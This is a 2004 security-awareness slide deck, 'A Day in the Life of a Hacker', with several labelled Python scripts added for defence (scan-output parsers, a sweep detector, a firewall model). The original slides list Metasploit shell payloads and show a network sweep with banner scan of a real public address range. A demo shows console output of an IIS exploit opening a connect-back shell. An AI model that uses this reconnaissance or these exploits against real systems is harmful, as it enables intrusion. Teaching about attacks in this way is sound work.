Security-Assessment.com Copyright Security-Assessment.com 2004 A Day in the Life of a Hacker by Brett Moore.


1 Security-Assessment.com Copyright Security-Assessment.com 2004 A Day in the Life of a Hacker by Brett Moore

2 Hacker, Cracker, Black Hat, Script Kiddie, Warez Pirate, Disgruntled employee, Ex-employee, Dishonest employee, Temporary employee, After-hours cleaner, etc.
“A hacker by any name, still hacks”
Opportunist vs. motivated

3

4

5 The Metasploit Project - Last Update: 02/21/2004
Sections: Metasploit - Shellcode - Opcode DB - Projects - Releases - Research - Contact - Links

The Shellcode Archive contains various payloads written by the Metasploit staff. All payloads come with source code and usage instructions. Many of the techniques (and some code) have been borrowed from other sources; credit is given where applicable. Almost none of the code here has been optimized for size: usually there is no need for it, and when there is, it makes more sense to rewrite it from scratch. Effort has been placed into writing payloads that not only work reliably under most environments, but also clean up after themselves when the target goal is achieved.

Win32 Vampiric Import Example
Many win32 operating systems include a large number of libraries and executables which are static across service packs. These files can be used to write really small service-pack independent payloads. The example below attaches to dbmssocn.dll and uses the import address table to download and execute a secondary payload.
Assembled Size: 179 bytes - Windows 2000 Vampiric Import ASM - Windows 2000 Vampiric Import C - Windows 2000 Vampiric Import Perl - Windows 2000 Vampiric Import Exe MD5 (30053a85bf2f57a8c8ac93f30ae10596)

Win32 OS/SP Independent Loader
This code uses the kernel32.dll locating technique described by LSD in their "Win32 Assembly Components" paper. Our implementation is based on code by Dino Dai Zovi, with minor changes to remove the need for any calls to GetProcAddress (all functions are found solely by their hash) and to provide a C function to obtain the hash value for a given string. The majority of the win32 payloads on this site use this loader.
- Win32 OS/SP Independent Loader C [Visual Studio]

Win32 Bind Shell
This payload will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket.
Assembled Size: 356 bytes - Win32 Bind Shell ASM - Win32 Bind Shell C - Win32 Bind Shell Perl - Win32 Bind Shell Exe MD5 (7995b0f4b8ab2f0ee2166ee51ae2048f)

Win32 Reverse Shell
This payload will load winsock, connect to the specified host, and spawn a cmd.exe shell. It will call WaitForSingleObject with an infinite timeout and then ExitProcess when the cmd.exe process has terminated. This payload has been tested on many service packs of Windows NT 4.0, Windows 2000, and Windows XP. This payload will NOT work on Windows 9x since cmd.exe does not exist and command.com can't send its output back to the socket. A newer, much smaller version of this payload will be released soon.
Assembled Size: 335 bytes - Win32 Reverse Shell ASM - Win32 Reverse Shell C - Win32 Reverse Shell Exe MD5 (323b372de2ee3998a9d0ee4e33184279)

Win32 Create Local Admin User
This payload will load netapi32.dll and call NetUserAdd followed by NetLocalGroupAddMembers. It will create a new user account with the username and password of "X" and add it to the local group "Administrators". This payload has been tested against Windows 2000 and Windows XP; it will not work on Windows 9x systems.
Assembled Size: 304 bytes - Win32 Add User ASM - Win32 Add User C - Win32 Add User Exe MD5 (bbc784fe965163b21cfac8f5a38eabcb)

Win32 Exception Handle Example
This payload demonstrates the use of the Windows exception handling system. Essentially it overwrites the SEH chain at fs:[0] and then triggers an exception through a null pointer dereference, jumping to the code we specify. This technique becomes very useful when writing exploits for bugs which only allow for a small number of bytes to be overwritten.
- Win32 Exception Handler ASM

x86 FNSTENV XOR Byte Decoder
This encoder uses the fnstenv instruction to save the floating point environment to the stack, where it pulls the original eip value and then decodes the real payload. This technique was first described by noir on the vuln-dev mailing list. The actual encoder can only handle 256 bytes in its current form; if more than 256 bytes are needed, change the sub cl to sub cx. The nice thing about this decoder is that it is small (23 bytes) and does not use the jmp/call trick to get the eip value; this may prevent certain signature matching intrusion detection systems from detecting the payload.
- FNSTENV Xor Decoder ASM

© 2004 METASPLOIT.COM
"I saw this discovery channel show the other day, about this lady who trained rats to run cat5 cable, apparently it works pretty good. So i could have this robot, that unleashes an army of augmented rats..." DL

8

9

10 Hacker Of Opportunity
- Low hanging fruit
- Exploitable by known vulnerabilities
- After peer recognition
- Web page defacement

11

12 -bash-2.05b$ nmap -sP 210.55.24.*

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-03-27 22:54 NZST
Host e1-0.core5.akl.iconz.net.nz (210.55.24.1) appears to be up.
Host nemo.blackpepper.co.nz (210.55.24.3) appears to be up.
Host stream.blackpepper.co.nz (210.55.24.4) appears to be up.
Host blackpepper.co.nz (210.55.24.6) appears to be up.
Host ns1.visp.co.nz (210.55.24.8) appears to be up.
Host vorash.visp.co.nz (210.55.24.9) appears to be up.
Host ns2.visp.co.nz (210.55.24.14) appears to be up.
Host tollan.visp.co.nz (210.55.24.15) appears to be up.
Host webmail.visp.co.nz (210.55.24.17) appears to be up.
Host sql.visp.co.nz (210.55.24.18) appears to be up.
Host mail.visp.co.nz (210.55.24.20) appears to be up.
Host kagan.visp.co.nz (210.55.24.22) appears to be up.
Host visp.co.nz (210.55.24.24) appears to be up.
Host signup.visp.co.nz (210.55.24.25) appears to be up.
Host help.visp.co.nz (210.55.24.26) appears to be up.
Host csr.visp.co.nz (210.55.24.27) appears to be up.
Host 210.55.24.28 appears to be up.
Host reg.visp.co.nz (210.55.24.29) appears to be up.
Host jackal.visp.co.nz (210.55.24.30) appears to be up.
Host datavisiondirect.co.nz (210.55.24.31) appears to be up.
Host roverland.co.nz (210.55.24.32) appears to be up.
Host flyingstart.co.nz (210.55.24.33) appears to be up.
Host 210.55.24.34 appears to be up.
Host 210.55.24.35 appears to be up.
Host 210.55.24.36 appears to be up.
Host kiwielectronics.co.nz (210.55.24.37) appears to be up.
Host 210.55.24.38 appears to be up.
Host 210.55.24.39 appears to be up.
Host 210.55.24.40 appears to be up.
Host 210.55.24.41 appears to be up.
Host 210.55.24.42 appears to be up.
Host 210.55.24.43 appears to be up.
Host 210.55.24.44 appears to be up.
Host 210.55.24.45 appears to be up.
Host 210.55.24.46 appears to be up.
Host 210.55.24.47 appears to be up.
Host 210.55.24.48 appears to be up.
Host 210.55.24.49 appears to be up.
Host savage.visp.co.nz (210.55.24.50) appears to be up.
Host squid.visp.co.nz (210.55.24.51) appears to be up.
Host johnatwork.visp.co.nz (210.55.24.52) appears to be up.
Host 210.55.24.53 appears to be up.
Host arwen.visp.co.nz (210.55.24.54) appears to be up.
Host 210.55.24.55 appears to be up.
Host 210.55.24.57 appears to be up.
Host 210.55.24.58 appears to be up.
Host 210.55.24.59 appears to be up.
Host 210.55.24.60 appears to be up.
Host 210.55.24.61 appears to be up.
Host 210.55.24.62 appears to be up.
Host 210.55.24.63 appears to be up.
Host 210.55.24.64 appears to be up.
Host 210.55.24.65 appears to be up.
Host visp.co.nz (210.55.24.66) appears to be up.
Host 210.55.24.67 appears to be up.
Host 210.55.24.68 appears to be up.
Host 210.55.24.69 appears to be up.
Host 210.55.24.70 appears to be up.
Host webhost.visp.co.nz (210.55.24.80) appears to be up.
Host 210.55.24.81 appears to be up.
Host 210.55.24.82 appears to be up.
Host 210.55.24.83 appears to be up.
Host 210.55.24.84 appears to be up.
Host 210.55.24.85 appears to be up.
Host 210.55.24.86 appears to be up.
Host rfgate.visp.co.nz (210.55.24.100) appears to be up.
Host 210.55.24.105 appears to be up.
Host 210.55.24.111 appears to be up.
Host dallimore.co.nz (210.55.24.112) appears to be up.
Host 210.55.24.113 appears to be up.
Host 210.55.24.114 appears to be up.
Host 210.55.24.115 appears to be up.
Host 210.55.24.116 appears to be up.
Host 210.55.24.120 appears to be up.
Host 210.55.24.121 appears to be up.
Host 210.55.24.122 appears to be up.
Host 210.55.24.123 appears to be up.
Host 210.55.24.124 appears to be up.
Host 210.55.24.125 appears to be up.
Host 210.55.24.150 appears to be up.
Host 210.55.24.151 appears to be up.
Host banking.visp.co.nz (210.55.24.152) appears to be up.
Host reg.coolnet.co.nz (210.55.24.153) appears to be up.
Host 210.55.24.177 appears to be up.
Host www.whoosh.co.nz (210.55.24.178) appears to be up.
Host www.whoosh.com.au (210.55.24.179) appears to be up.
Host worksol.worksolutions.com.au (210.55.24.180) appears to be up.
Host 210.55.24.181 appears to be up.
Host 210.55.24.182 appears to be up.
Host 210.55.24.183 appears to be up.
Host mail.chameleon.net.nz (210.55.24.184) appears to be up.
Host www.chameleon.net.nz (210.55.24.185) appears to be up.
Host 210.55.24.189 appears to be up.
Host 210.55.24.193 appears to be up.
Host 210.55.24.199 appears to be up.
Host stimpy.blackpepper.co.nz (210.55.24.201) appears to be up.
Host visp.co.nz (210.55.24.202) appears to be up.
Host 210.55.24.203 appears to be up.
Host 210.55.24.205 appears to be up.
Host 210.55.24.206 appears to be up.
Host 210.55.24.234 appears to be up.
Host 210.55.24.250 appears to be up.
Nmap run completed -- 256 IP addresses (102 hosts up) scanned in 5.206 seconds
-bash-2.05b$

% Advanced port ping only
% Using raw request timeout: 7 secs
% Scanning 192.168.1.* (254 ips)
% 4 servers found, 10 seconds
192.168.1.68   [OPEN]
192.168.1.252  [closed]
192.168.1.253  [closed]
192.168.1.254  [OPEN]
% 2 open, 2 closed, 0 filtered
% 4 responses shown, 10 seconds

% Using raw request timeout: 7 secs
% Scanning 210.55.24.* (254 ips)
% 69 servers found, 10 seconds
210.55.24.4    Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4
210.55.24.17   Server: Apache/1.3.17 (Unix) PHP/4.0.4 mod_ssl/2.8.0 OpenSSL/0.9.6
210.55.24.29   Server: Microsoft-IIS/4.0
210.55.24.36   Server: Microsoft-IIS/4.0
210.55.24.37   Server: Microsoft-IIS/4.0
210.55.24.28   Server: Microsoft-IIS/4.0
210.55.24.32   Server: Microsoft-IIS/4.0
210.55.24.6    Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4
210.55.24.31   Server: Microsoft-IIS/4.0
210.55.24.38   Server: Microsoft-IIS/4.0
210.55.24.39   Server: Microsoft-IIS/4.0
210.55.24.3    Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4
210.55.24.15   Server: Apache/1.3.26 (Unix) PHP/4.2.1
210.55.24.26   Server: Microsoft-IIS/4.0
210.55.24.24   Server: Microsoft-IIS/4.0
210.55.24.40   Server: Microsoft-IIS/4.0
210.55.24.41   Server: Microsoft-IIS/4.0
210.55.24.42   Server: Microsoft-IIS/4.0
210.55.24.48   Server: Microsoft-IIS/4.0
210.55.24.53   Server: Microsoft-IIS/4.0
210.55.24.59   Server: Microsoft-IIS/4.0
210.55.24.60   Server: Microsoft-IIS/4.0
210.55.24.65   Server: Microsoft-IIS/4.0
210.55.24.66   Server: Microsoft-IIS/4.0
210.55.24.64   Server: Microsoft-IIS/4.0
210.55.24.57   Server: Microsoft-IIS/4.0
210.55.24.54   Server: Microsoft-IIS/4.0
210.55.24.61   Server: Microsoft-IIS/4.0
210.55.24.43   Server: Microsoft-IIS/4.0
210.55.24.47   Server: Microsoft-IIS/4.0
210.55.24.80   Server: Microsoft-IIS/5.0
210.55.24.81   Server: Microsoft-IIS/5.0
210.55.24.82   Server: Microsoft-IIS/5.0
210.55.24.83   Server: Microsoft-IIS/5.0
210.55.24.84   Server: Microsoft-IIS/5.0
210.55.24.85   Server: Microsoft-IIS/5.0
210.55.24.105  Server: Microsoft-IIS/5.0
210.55.24.111  Server: Microsoft-IIS/5.0
210.55.24.112  Server: Microsoft-IIS/5.0
210.55.24.113  Server: Microsoft-IIS/5.0
210.55.24.114  Server: Microsoft-IIS/5.0
210.55.24.115  Server: Microsoft-IIS/5.0
210.55.24.116  Server: Microsoft-IIS/5.0
210.55.24.120  Server: Microsoft-IIS/5.0
210.55.24.86   Server: Microsoft-IIS/5.0
210.55.24.121  Server: Microsoft-IIS/5.0
210.55.24.122  Server: Microsoft-IIS/5.0
210.55.24.123  Server: Microsoft-IIS/5.0
210.55.24.124  Server: Microsoft-IIS/5.0
210.55.24.125  Server: Microsoft-IIS/5.0
210.55.24.153  Server: Microsoft-IIS/4.0
210.55.24.178  Server: Microsoft-IIS/4.0
210.55.24.180  Server: Microsoft-IIS/4.0
210.55.24.182  Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b DAV/2 mod_jk2/2.0.3-dev PHP/4.3.4
210.55.24.181  Server: UserLand Frontier/8.0.5-MacOSX
210.55.24.184  Server: Apache/1.3.28 (Unix) PHP/4.3.2
210.55.24.185  Server: Apache/1.3.28 (Unix) PHP/4.3.2
210.55.24.201  Server: Microsoft-IIS/5.0
210.55.24.205  Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b DAV/2 mod_jk2/2.0.3-dev PHP/4.3.4
210.55.24.179  Server: Microsoft-IIS/4.0
210.55.24.234  Server: Microsoft-IIS/5.0
210.55.24.206  Server: Microsoft-IIS/5.0
210.55.24.42   Server: Microsoft-IIS/4.0
210.55.24.43   Server: Microsoft-IIS/4.0
210.55.24.53   Server: Microsoft-IIS/4.0
210.55.24.54   Server: Microsoft-IIS/4.0
210.55.24.123  Server: Microsoft-IIS/5.0
210.55.24.153  Server: Microsoft-IIS/4.0
210.55.24.28   Server: Microsoft-IIS/4.0
% 69 responses shown, 30 seconds

SYSTEMX:>tmp/tools/> Scanner –p80 192.168.1.1 – 192.168.1.254
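The same two outputs are just as useful to the owner of the address range as to the scanner: they are a free inventory of what is reachable and what software version each host advertises. The script below is an added example (not part of Brett Moore's presentation) that parses the two formats shown on the slide, the `nmap -sP` host lines and the fused `IP Server: banner` lines, and groups hosts by server product. The sample input is constructed with documentation addresses, not the real hosts from the scan, and the 4-host summary line is likewise made up.

```python
"""Host and web-server inventory from ping-sweep and banner-scan output.

Added example, not part of the original presentation. It parses the two
output formats shown on the slide (`nmap -sP` host lines and `IP Server:
banner` lines) and groups hosts by server product so the owner of an
address range can see which software versions are exposed on port 80.
"""
import re
from collections import defaultdict

# Constructed sample input in the same shape as the slide output (documentation
# addresses, not the real hosts from the scan).
NMAP_SWEEP = """\
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-03-27 22:54 NZST
Host e1-0.core5.example.net (192.0.2.1) appears to be up.
Host www.example.net (192.0.2.3) appears to be up.
Host 192.0.2.28 appears to be up.
Host mail.example.net (192.0.2.68) appears to be up.
Nmap run completed -- 256 IP addresses (4 hosts up) scanned in 5.206 seconds
"""

# The banner scanner on the slide prints the address fused to "Server:"; the
# parser accepts that form and the space-separated one.
BANNERS = """\
% Scanning 192.0.2.* (254 ips)
192.0.2.3Server: Apache/2.0.48 (Unix) mod_ssl/2.0.48 OpenSSL/0.9.7b PHP/4.3.4
192.0.2.28Server: Microsoft-IIS/4.0
192.0.2.68 Server: Microsoft-IIS/5.0
192.0.2.68Server: Microsoft-IIS/5.0
% 4 responses shown, 30 seconds
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
NMAP_HOST_RE = re.compile(
    r"^Host (?:(?P<name>\S+) \((?P<ip>" + IPV4 + r")\)|(?P<bare>" + IPV4 + r")) appears to be up\.$"
)
BANNER_RE = re.compile(r"^(?P<ip>" + IPV4 + r")\s*Server:\s*(?P<banner>.+?)\s*$")


def ip_key(ip):
    """Sort key that orders dotted quads numerically rather than as strings."""
    return tuple(int(octet) for octet in ip.split("."))


def parse_ping_sweep(text):
    """Map IP -> reverse-DNS name (None when nmap printed only the address)."""
    hosts = {}
    for line in text.splitlines():
        m = NMAP_HOST_RE.match(line.strip())
        if m:
            hosts[m.group("ip") or m.group("bare")] = m.group("name")
    return hosts


def parse_banners(text):
    """Map IP -> Server header; repeated lines for one host collapse to the first."""
    banners = {}
    for line in text.splitlines():
        m = BANNER_RE.match(line.strip())
        if m:
            banners.setdefault(m.group("ip"), m.group("banner"))
    return banners


def product_version(banner):
    """'Apache/2.0.48 (Unix) ...' -> 'Apache/2.0.48': the first token names the product."""
    return banner.split()[0]


def by_product(banners):
    """Group hosts by product/version so outdated versions stand out at a glance."""
    groups = defaultdict(list)
    for ip, banner in banners.items():
        groups[product_version(banner)].append(ip)
    return {product: sorted(ips, key=ip_key) for product, ips in groups.items()}


def unbannered(hosts, banners):
    """Hosts that answered the ping sweep but returned no HTTP banner."""
    return sorted((ip for ip in hosts if ip not in banners), key=ip_key)


if __name__ == "__main__":
    hosts = parse_ping_sweep(NMAP_SWEEP)
    banners = parse_banners(BANNERS)
    for product, ips in sorted(by_product(banners).items()):
        print(f"{product:<24} {len(ips):>3} host(s): {', '.join(ips)}")
    print("up but no HTTP banner:", ", ".join(unbannered(hosts, banners)))
```

Run against the real slide output, the `by_product` view is what makes the point of the next slide concrete: a range in which most web servers identify themselves as the same IIS version is exactly the kind of inventory an opportunist builds from the outside, and the kind an administrator should build first.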

13 Hacker Of Opportunity
- Constantly scanning the Internet
- Vast log files of computers
- Distance is no protection
- New Zealand is no safer than elsewhere

14 DEMO 1 : Exploiting a known vulnerability

15

16

17 E:\exploits>checkmedia 192.168.1.68
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 27 Mar 2004 11:13:30 GMT
Content-Type: text/html
NetShow ISAPI Log Dll
NetShow ISAPI Log Dll

E:\exploits>nsiislog
** IISNSLOG.DLL - Windows Media Services - Remote Shell **
** Tested Against Service Pack 4 **
Usage: nsiislog ip [ourip] [ourport]

E:\exploits>nsiislog 192.168.1.68
** IISNSLOG.DLL - Windows Media Services - Remote Shell **
** Tested Against Service Pack 4 **
. Calling Home: blackhole:2000
. Preparing Exploit Buffer...…Ready
. Starting Listener On Port: 2000
. Connecting To 192.168.1.68
. Sending Exploit......Exploit Sent
. Connection Received

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>\whoami
IWAM_BLACKHOLE

C:\WINNT\system32>

18 Prevention
- Be aware of the problems and stay current with patches
- Subscribe to vendor security mailing lists
- Be alert to large increases in bandwidth
- The large amount of bogus traffic on the Internet makes logs less useful
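The last two points pull in opposite directions: you want to notice scanning, but the background noise of the Internet means that alerting on volume alone drowns you. The sweep shown on slide 12 has a log signature that survives the noise: one source touching many distinct destinations within a short window. The script below is an added example, not part of the presentation, that applies that rule to firewall log lines. The log layout is a constructed, netfilter-style format, and the sample lines (a fast sweep, a chatty legitimate client, a slow scanner, one unparseable line) are made up; adjust `LOG_RE` for a real firewall's format.

```python
"""Sweep detection over firewall log lines.

Added example, not part of the original presentation. Counts distinct
destinations per source inside a sliding time window; a source above the
threshold is behaving like the ping/port sweep on slide 12, while a busy
but legitimate client (many hits, one destination) stays below it.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed netfilter-style layout: ISO timestamp, host, kernel prefix, then
# SRC=/DST=/DPT= fields. Real firewalls differ; only this regex needs changing.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) \S+ kernel: .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def _line(ts, src, dst, spt, dpt):
    """Build one constructed log line in the layout LOG_RE expects."""
    return f"{ts} fw kernel: IN=eth0 OUT= SRC={src} DST={dst} PROTO=TCP SPT={spt} DPT={dpt}"


# Constructed sample log (documentation addresses).
SAMPLE_LOG = (
    # fast sweep: one source, eight targets in eight seconds
    [_line(f"2004-03-27T22:54:{i:02d}", "203.0.113.9", f"192.0.2.{i}", 40000 + i, 80) for i in range(1, 9)]
    # ordinary client: thirty hits, all to one destination
    + [_line(f"2004-03-27T22:54:{i:02d}", "198.51.100.7", "192.0.2.3", 50000 + i, 443) for i in range(30)]
    # slow scanner: three targets spread over five minutes
    + [
        _line("2004-03-27T22:50:00", "203.0.113.50", "192.0.2.10", 1234, 80),
        _line("2004-03-27T22:52:30", "203.0.113.50", "192.0.2.11", 1235, 80),
        _line("2004-03-27T22:55:00", "203.0.113.50", "192.0.2.12", 1236, 80),
        "Mar 27 22:55:01 fw kernel: eth0: link is up",  # unrelated line, must be ignored
    ]
)


def parse_events(lines):
    """Return (timestamp, src, dst, dport) tuples; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group("ts")), m.group("src"),
                           m.group("dst"), int(m.group("dpt"))))
    return events


def max_distinct_in_window(events, window):
    """Largest number of distinct targets seen in any `window`-second span.

    `events` is a time-sorted list of (timestamp, target). Two pointers walk the
    list; a Counter tracks how many in-window hits each target currently has.
    """
    counts, best, lo = Counter(), 0, 0
    for t, target in events:
        counts[target] += 1
        while (t - events[lo][0]).total_seconds() > window:
            old = events[lo][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            lo += 1
        best = max(best, len(counts))
    return best


def detect_sweeps(lines, window=60, min_targets=5):
    """Map source -> distinct-target count for sources that look like a sweep."""
    per_src = defaultdict(list)
    for t, src, dst, _dpt in parse_events(lines):
        per_src[src].append((t, dst))
    alerts = {}
    for src, evs in per_src.items():
        evs.sort()
        n = max_distinct_in_window(evs, window)
        if n >= min_targets:
            alerts[src] = n
    return alerts


if __name__ == "__main__":
    for src, n in detect_sweeps(SAMPLE_LOG).items():
        print(f"sweep from {src}: {n} distinct targets within 60s")
```

The threshold and window are the tuning knobs: a 60-second window with five targets catches the fast sweep and ignores the slow scanner, while widening the window to ten minutes and lowering the threshold to three catches the slow scanner too, at the cost of more noise from legitimate sources that genuinely talk to several hosts.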

19

20 Hacker Of Motive
- Revenge
- Private information
- Take their time
- Information discovery
- Whois, nslookup, mail headers

21

22 >nslookup acme.co.nz
Server:  UnKnown
Address:  192.168.1.254

Non-authoritative answer:
Name:    acme.co.nz
Address:  192.168.1.1

>nslookup www.acme.co.nz
Server:  UnKnown
Address:  192.168.1.254

Non-authoritative answer:
Name:    www.acme.co.nz
Address:  192.168.1.1

>nslookup mail.acme.co.nz
Server:  UnKnown
Address:  192.168.1.254

Non-authoritative answer:
Name:    mail.acme.co.nz
Address:  192.168.1.68

>nslookup
Default Server:  UnKnown
Address:  192.168.1.254

> set type=any
> acme.co.nz
Server:  UnKnown
Address:  192.168.1.254

Non-authoritative answer:
acme.co.nz      MX preference = 5, mail exchanger = mail.acme.co.nz
acme.co.nz      internet address = 192.168.1.1
acme.co.nz
        primary name server = ns.blackhole
        responsible mail addr = mail.blackhole.co.nz
        serial  = 3012820
        refresh = 86400 (1 day)
        retry   = 7200 (2 hours)
        expire  = 3600000 (41 days 16 hours)
        default TTL = 28800 (8 hours)
acme.co.nz      nameserver = ns.blackhole
acme.co.nz      nameserver = ns.blackhole
mail.acme.co.nz internet address = 192.168.1.68
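A single `set type=any` query hands over the whole public picture of a zone: where the web site lives, which host receives mail (and that it is a different machine from the web server), who runs the name service, and the SOA timers. The script below is an added example, not part of the presentation, that parses the Windows `nslookup` answer shown above into a structured record and derives the list of hostnames and the mail-server-to-address mapping it reveals, which is what a motivated attacker writes down and what a zone owner should review before publishing. The sample input reproduces the slide's answer section; the `nslookup` layout with the SOA fields indented under the owner name is what the Windows client prints.

```python
"""Parse the answer section of a Windows `nslookup` `set type=any` query.

Added example, not part of the original presentation. The record it builds
(A, MX, NS and SOA data) is the same information the slide shows being
gathered by hand, so the derived views below are a checklist of what the
zone publishes.
"""
import re

# Sample input: the answer section from the slide, in the layout the Windows
# nslookup client prints (SOA fields indented under the owner name).
SAMPLE = """\
Non-authoritative answer:
acme.co.nz      MX preference = 5, mail exchanger = mail.acme.co.nz
acme.co.nz      internet address = 192.168.1.1
acme.co.nz
        primary name server = ns.blackhole
        responsible mail addr = mail.blackhole.co.nz
        serial  = 3012820
        refresh = 86400 (1 day)
        retry   = 7200 (2 hours)
        expire  = 3600000 (41 days 16 hours)
        default TTL = 28800 (8 hours)
acme.co.nz      nameserver = ns.blackhole
acme.co.nz      nameserver = ns.blackhole
mail.acme.co.nz internet address = 192.168.1.68
"""

MX_RE = re.compile(r"^(\S+)\s+MX preference = (\d+), mail exchanger = (\S+)$")
A_RE = re.compile(r"^(\S+)\s+internet address = (\S+)$")
NS_RE = re.compile(r"^(\S+)\s+nameserver = (\S+)$")
SOA_RE = re.compile(
    r"^(primary name server|responsible mail addr|serial|refresh|retry|expire|default TTL)\s*= (\S+)"
)


def parse_any(text):
    """Build {'A': {name: [addr]}, 'MX': [(pref, host)], 'NS': [host], 'SOA': {...}}."""
    rec = {"A": {}, "MX": [], "NS": [], "SOA": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := MX_RE.match(line)):
            rec["MX"].append((int(m.group(2)), m.group(3)))
        elif (m := A_RE.match(line)):
            rec["A"].setdefault(m.group(1), []).append(m.group(2))
        elif (m := NS_RE.match(line)):
            if m.group(2) not in rec["NS"]:      # the slide lists the same NS twice
                rec["NS"].append(m.group(2))
        elif (m := SOA_RE.match(line)):
            key, val = m.group(1), m.group(2)
            rec["SOA"][key] = int(val) if val.isdigit() else val
    return rec


def mail_servers(rec):
    """MX hosts in preference order, each with the addresses the same answer gave for it."""
    return [(host, rec["A"].get(host, [])) for _pref, host in sorted(rec["MX"])]


def hostnames(rec):
    """Every hostname the zone publishes: A owners, MX targets, NS and SOA primary."""
    names = set(rec["A"]) | {host for _pref, host in rec["MX"]} | set(rec["NS"])
    if "primary name server" in rec["SOA"]:
        names.add(rec["SOA"]["primary name server"])
    return sorted(names)


if __name__ == "__main__":
    rec = parse_any(SAMPLE)
    print("hosts published:", ", ".join(hostnames(rec)))
    for host, addrs in mail_servers(rec):
        print(f"mail is handled by {host} at {', '.join(addrs) or 'address not in answer'}")
    print("SOA serial:", rec["SOA"]["serial"])
```

The parser handles the Windows client's layout only; BIND's `dig` prints the same data in presentation format, which would need a different set of patterns.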

23

24 Hacker Of Motive
- Easy access through an email trojan
- The Staff@home attack
- The Staff@work attack

25 Hacker Of Motive
- Will replicate the target environment
- Discover new vulnerabilities
- Create new exploits
- New exploits pass through IDS rules

26 DEMO 2 : Exploiting an unknown vulnerability

27

28

29

30 Firewalls
- No firewall: attacker's connection allowed
- Firewall blocks the connection: attacker uses a connect-back shell
- Firewall blocks the connection and the connect-back: attacker uses a socket-reuse shell
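The three rows on this slide are a progression of firewall policies and the shell type that gets through each one. The script below is an added example, not part of the presentation, that models that progression: a stateful firewall that checks only new connections against an allow-list, and four flows, the exploit request itself plus the three shell styles. Port 80 is the published web service from the demos, port 2000 is the connect-back port from the slide 17 output, and port 4444 for the bind shell is a constructed value. The result table is the point: the exploit request is allowed by every policy because it goes to the published service, and the socket-reuse shell is invisible to all of them because it never opens a new connection, which is why the next two slides add IDS, host controls and log analysis on top of the firewall.

```python
"""Why successive firewall policies stop one shell style but not the next.

Added example, not part of the original presentation. A Flow is either a new
connection (checked against the policy) or traffic on an already-established
connection (passed by a stateful firewall). Port 2000 is the connect-back
port from the slide 17 output; 4444 is a constructed bind-shell port.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional


@dataclass(frozen=True)
class Flow:
    direction: str   # "in": initiated from the Internet toward the server; "out": from the server outward
    dport: int       # destination port of the connection
    new: bool        # True for a new connection, False for data on an established one


@dataclass(frozen=True)
class Policy:
    name: str
    inbound_new: Optional[FrozenSet[int]]    # None = allow any new inbound; set = only these ports
    outbound_new: Optional[FrozenSet[int]]   # None = allow any new outbound; empty set = none

    def permits(self, flow: Flow) -> bool:
        """Stateful check: established traffic always passes; new connections hit the allow-list."""
        if not flow.new:
            return True
        allowed = self.inbound_new if flow.direction == "in" else self.outbound_new
        return allowed is None or flow.dport in allowed


# The four flows the slide's progression turns on.
FLOWS: Dict[str, Flow] = {
    "exploit request":    Flow("in", 80, new=True),     # the request carrying the exploit to the web service
    "bind shell":         Flow("in", 4444, new=True),   # attacker connects to a new listener on the server
    "connect-back shell": Flow("out", 2000, new=True),  # server connects out to the attacker
    "socket-reuse shell": Flow("in", 80, new=False),    # shell rides the connection that carried the exploit
}

# The three policies on the slide, in order.
POLICIES = [
    Policy("no firewall", None, None),
    Policy("inbound filter only", frozenset({80}), None),
    Policy("inbound and outbound filter", frozenset({80}), frozenset()),
]


def evaluate(policies=POLICIES, flows=FLOWS):
    """Map policy name -> {flow name -> permitted?}."""
    return {p.name: {name: p.permits(flow) for name, flow in flows.items()} for p in policies}


def first_working_shell(policy: Policy, flows=FLOWS):
    """The first shell style (in slide order) that the policy lets through, or None."""
    for name, flow in flows.items():
        if name != "exploit request" and policy.permits(flow):
            return name
    return None


if __name__ == "__main__":
    table = evaluate()
    width = max(len(name) for name in FLOWS)
    for policy in POLICIES:
        print(policy.name)
        for name, ok in table[policy.name].items():
            print(f"  {name:<{width}}  {'allowed' if ok else 'blocked'}")
        print(f"  -> attacker falls back to: {first_working_shell(policy)}")
```

The model is deliberately only as detailed as the slide: it does not distinguish which outbound ports a real egress policy would still have to allow, and it treats the firewall as purely stateful. Even so it shows the limit the slide is making: a firewall decides on connection metadata, and a shell that reuses an allowed connection presents none.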

31 Prevention
- Virus scanners
- Intrusion Detection Systems
- Firewalls
- Ensure strong passwords and adequate firewall rules are enforced

32 Prevention
- Internal IDS
- Educated staff
- Forensic response ability, Tripwire
- Intelligent log analysis

33 Presentation Slides Available For Download From: http://www.security-assessment.com

34 NEWS LINKS
Police called after National Party website hacked
http://www.nzherald.co.nz/latestnewsstory.cfm?storyID=3554851&thesection=news&thesubsection=general
Local hacker faces big bill
http://www.nzherald.co.nz/storydisplay.cfm?storyID=3555542&thesection=technology&thesubsection=general
Kiwis 'have weakness for internet scams'
http://www.stuff.co.nz/stuff/0,2106,2811488a28,00.html
Australian hacker activity on the rise
http://www.zdnet.com.au/news/security/0,2000061744,39116594,00.htm
NZ Police lay first charge for hacking
http://www.stuff.co.nz/stuff/0,2106,2845353a6022,00.html
